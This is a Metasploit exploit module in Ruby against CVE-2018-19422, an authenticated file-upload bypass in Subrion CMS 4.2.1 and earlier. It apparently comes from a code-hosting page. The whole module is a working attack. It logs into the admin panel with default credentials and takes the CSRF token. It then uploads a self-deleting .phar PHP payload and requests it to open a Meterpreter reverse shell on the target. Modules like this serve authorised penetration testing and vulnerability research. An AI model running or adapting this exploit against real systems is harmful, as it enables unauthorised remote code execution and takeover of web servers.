218 lines
7.5 KiB
Ruby
218 lines
7.5 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::PhpEXE
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',
|
|
'Description' => %q{
|
|
This module exploits an authenticated file upload vulnerability in
|
|
Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by
|
|
the .htaccess file not preventing the execution of .pht, .phar, and
|
|
.xhtml files. Files with these extensions are not included in the
|
|
.htaccess blacklist, hence these files can be uploaded and executed
|
|
to achieve remote code execution. In this module, a .phar file with
|
|
a randomized name is uploaded and executed to receive a Meterpreter
|
|
session on the target, then deletes itself afterwards.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'Hexife', # Original discovery, PoC, and CVE submission
|
|
'Fellipe Oliveira', # ExploitDB author
|
|
'Ismail E. Dawoodjee' # Metasploit module author
|
|
],
|
|
'References' => [
|
|
[ 'EDB', '49876' ],
|
|
[ 'CVE', '2018-19422' ],
|
|
[ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],
|
|
[ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],
|
|
[ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]
|
|
],
|
|
'Platform' => 'php',
|
|
'Arch' => ARCH_PHP,
|
|
'Targets' => [
|
|
[
|
|
'PHP',
|
|
{
|
|
'Platform' => 'php',
|
|
'Arch' => ARCH_PHP,
|
|
'Type' => :php,
|
|
'DefaultOptions' => {
|
|
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
|
|
}
|
|
}
|
|
]
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => '2018-11-04',
|
|
'DefaultTarget' => 0,
|
|
'Notes' => {
|
|
'Stability' => [CRASH_SAFE],
|
|
'Reliability' => [REPEATABLE_SESSION],
|
|
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
|
|
}
|
|
)
|
|
)
|
|
register_options(
|
|
[
|
|
Opt::RPORT(80, true, 'Subrion CMS default port'),
|
|
OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
|
|
OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),
|
|
OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])
|
|
]
|
|
)
|
|
end
|
|
|
|
def check
|
|
uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash
|
|
print_status("Checking target web server for a response at: #{full_uri(uri)}")
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => uri
|
|
})
|
|
|
|
unless res
|
|
return CheckCode::Unknown('Target did not respond to check request.')
|
|
end
|
|
|
|
unless res.code == 200 && res.body.downcase.include?('subrion')
|
|
return CheckCode::Unknown('Target is not running Subrion CMS.')
|
|
end
|
|
|
|
print_good('Target is running Subrion CMS.')
|
|
|
|
# Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br>
|
|
print_status('Checking Subrion CMS version...')
|
|
version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first
|
|
|
|
unless version_number
|
|
return CheckCode::Detected('Subrion CMS version cannot be determined.')
|
|
end
|
|
|
|
print_good("Target is running Subrion CMS Version #{version_number}.")
|
|
|
|
if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')
|
|
return CheckCode::Appears(
|
|
'However, this version check does not guarantee that the target is vulnerable, ' \
|
|
'since a fix for the vulnerability can easily be applied by a web admin.'
|
|
)
|
|
end
|
|
|
|
return CheckCode::Safe
|
|
end
|
|
|
|
def login_and_get_csrf_token(username, password)
|
|
print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')
|
|
|
|
# Session cookies need to be kept to preserve the CSRF token across multiple requests
|
|
uri = normalize_uri(target_uri.path, 'panel/')
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => uri,
|
|
'keep_cookies' => true
|
|
})
|
|
|
|
unless res && res.code == 200
|
|
fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")
|
|
end
|
|
|
|
# <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">
|
|
%r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body
|
|
fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?
|
|
|
|
print_good("Successfully obtained CSRF token: #{csrf_token}")
|
|
|
|
print_status(
|
|
"Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \
|
|
"using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"
|
|
)
|
|
auth = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => uri,
|
|
'keep_cookies' => true,
|
|
'vars_post' => {
|
|
'__st' => csrf_token,
|
|
'username' => username,
|
|
'password' => password
|
|
}
|
|
})
|
|
|
|
unless auth && auth.code == 200
|
|
fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")
|
|
end
|
|
|
|
%r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body
|
|
unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')
|
|
fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")
|
|
end
|
|
|
|
print_good('Successfully logged in as Administrator.')
|
|
return csrf_token
|
|
end
|
|
|
|
def upload_and_execute_payload(csrf_token)
|
|
print_status('Preparing payload...')
|
|
|
|
# set `unlink_self: true` to delete the file after execution
|
|
payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"
|
|
php_payload = get_write_exec_payload(unlink_self: true)
|
|
|
|
data = Rex::MIME::Message.new
|
|
data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')
|
|
data.add_part('upload', nil, nil, 'form-data; name="cmd"')
|
|
data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
|
|
data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')
|
|
data.add_part(
|
|
"#{php_payload}\n",
|
|
'application/octet-stream',
|
|
nil,
|
|
"form-data; name=\"upload[]\"; filename=\"#{payload_name}\""
|
|
)
|
|
data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')
|
|
|
|
print_status('Sending POST data...')
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),
|
|
'keep_cookies' => true,
|
|
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
|
'data' => data.to_s
|
|
})
|
|
|
|
unless res && res.code == 200
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")
|
|
end
|
|
payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)
|
|
|
|
print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")
|
|
|
|
# This execution request returns nil
|
|
print_status("Executing '#{payload_name}'... This file will be deleted after execution.")
|
|
send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => payload_uri,
|
|
'keep_cookies' => true
|
|
})
|
|
|
|
print_good("Successfully executed payload: #{full_uri(payload_uri)}")
|
|
end
|
|
|
|
def exploit
|
|
csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])
|
|
upload_and_execute_payload(csrf_token)
|
|
end
|
|
|
|
end
|